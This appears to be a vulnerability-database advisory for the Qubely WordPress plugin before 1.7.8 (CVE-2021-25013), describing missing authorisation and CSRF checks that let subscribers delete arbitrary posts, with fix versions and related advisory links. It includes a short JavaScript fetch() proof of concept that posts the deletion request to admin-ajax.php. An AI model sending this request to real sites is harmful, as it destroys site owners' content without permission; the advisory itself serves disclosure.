Lucene search
Krzysztof ZającWPEX-ID:E88B7A70-EE71-439F-B3C6-0300ADB980B0HistoryDec 27, 2021 - 12:00 a.m.
Qubely < 1.7.8 - Subscriber+ Arbitrary Post Deletion
2021-12-2700:00:00
Krzysztof Zając
57
0.001 Low
EPSS
Percentile
21.3%
The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts Note: v1.7.7 added capability check, CSRF check were added in 1.7.8
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=qubely_delete_saved_block&block_id=1",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
prion
prion
Cross site request forgery (csrf)
2022-01-24 08:15:00
cnvd
cnvd
WordPress Qubely plugin cross-site request forgery vulnerability
2022-01-26 00:00:00
wpvulndb
wpvulndb
Qubely < 1.7.8 - Subscriber+ Arbitrary Post Deletion
2021-12-27 00:00:00
cve
cve
CVE-2021-25013
2022-01-24 08:15:09
patchstack
patchstack
nvd
nvd
CVE-2021-25013
2022-01-24 08:15:09
cvelist
cvelist
CVE-2021-25013 Qubely < 1.7.8 - Subscriber+ Arbitrary Post Deletion
2022-01-24 08:01:08